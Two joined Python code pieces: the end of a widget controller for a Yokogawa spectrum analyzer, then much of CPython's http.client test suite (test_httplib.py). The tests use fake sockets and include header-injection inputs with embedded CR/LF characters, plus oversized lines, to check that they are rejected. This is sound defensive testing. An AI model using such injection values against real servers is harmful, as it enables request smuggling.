self.ui.refresh_trace.on_click(self.refreshTrace)
self.ui.trace.observe(self.select_trace, 'value')
self.ui.λ.observe(self.update_λ, 'value')
self.ui.bandwidth.observe(self.update_bdwt, 'value')
self.ui.pts.observe(self.update_points, 'value')
self.ui.res.observe(self.update_res, 'index')
self.ui.clr.on_click(self.clear_all_trace)
self.ui.clr_keep.on_click(self.clear_keep_trace)
self.ui.keep.on_click(self.keep_trace)
self.ui.save.on_click(self.save_data)
self.ui.freq_scale.observe(self.freq_scale, 'value')
self.ui.scan.observe(self.scanType, 'value')
# # ----------------------------------
# # -- Worker for scanning
# # ----------------------------------
# run_thread = True
# def worker(f, instr):
# while run_thread:
# try:
# #with Yokogawa(ip=ip) as instr:
# trace = instr.trace
# # x = np.linspace(600, 1700, 50001)
# # y = np.log10(np.random.rand(50001)*(1/np.cosh((x-(700+1850)/2)/10))**2)
# f.data[0].x = trace.lbd.values*1e9
# f.data[0].y = trace.S.values
# except:
# print('Communication error')
# time.sleep(0.1)
# #with Yokogawa(ip=ip) as instr:
# trace = instr.trace
# # x = np.linspace(600, 1700, 50001)
# # y = np.log10(np.random.rand(50001)*(1/np.cosh((x-(700+1850)/2)/10))**2)
# f.data[0].x = trace.lbd.values*1e9
# f.data[0].y = trace.S.values
# time.sleep(0.1)
#
#
#
# # ----------------------------------
# # -- Setup the Connectors
# # ----------------------------------
#
#
# def scan_osa(change):
# global thread_osa
# global run_thread
# run_thread = False
# ip = ui.ip.value
# if connected:
# # osa.scan = change.new.lower()
# run_thread = False
# if change.new.lower() == 'single' or change.new.lower() == 'repeat':
# with Yokogawa(ip=ip) as osa:
# osa.scan = change.new.lower()
# run_thread = True
# thread_osa = threading.Thread(target=worker, args=(figOSA, osa))
# thread_osa.start()
# if change.new.lower() == 'stop':
# with Yokogawa(ip=ip) as osa:
# osa.scan = change.new.lower()
# print('Trying to kill the stuff')
# run_thread = False
#
#
# # ----------------------------------
# # -- connect callbacks and traits
# # ----------------------------------
# ui.cnct.observe(connect, 'value')
# ui.scan.observe(scan_osa,'value')
# ui.trace.observe(select_trace, 'value')
# ui.λ.observe(update_λ, 'value')
# ui.bandwidth.observe(update_bdwt, 'value')
# ui.pts.observe(update_points, 'value')
# ui.res.observe(update_res, 'index')
# ui.clr.on_click(clear_trace)
# ui.save.on_click(save_data)
# ui.freq_scale.observe(freq_scale, 'value')
#
#
# # ----------------------------------
# # -- Display
# # ----------------------------------
# box_layout = wdg.Layout(display='flex',
# flex_flow='column',
# flex_wrap = 'wrap',
# align_content = 'stretch',
# justify_content = 'center',
# align_items='stretch',
# width='28%')
# outp_layout = wdg.Layout(display='flex',
# flex_flow='column',
# flex_wrap = 'wrap',
# align_content = 'stretch',
# justify_content = 'center',
# align_items='stretch',
# width='72%')
# ui.picker.layout = wdg.Layout(display='flex',
# flex_flow='column',
# flex_wrap = 'wrap',
# align_content = 'stretch',
# justify_content = 'center',
# align_items='stretch',
# width='100%')
# cc = [ui.cnct,ui.freq_scale, ui.ip,ui.scan, ui.trace, ui.res,ui.bandwidth, ui.pts,ui.λ, ui.clr,ui.save,ui.picker]
# ctrl = wdg.Box(children = cc,layout = box_layout)
# otp = wdg.Box(children = [figOSA], layout = outp_layout)
# display(wdg.HBox([ctrl, otp]))
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import socket
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
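# Minimal socket stand-in: records everything passed to sendall() and serves the canned text back through makefile().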
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\nContent-Length:')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile():
mode = 'r'
d = data()
def read(self, blocksize=-1):
return self.d.__next__()
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test HTTPResponse with no \r\n termination.
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
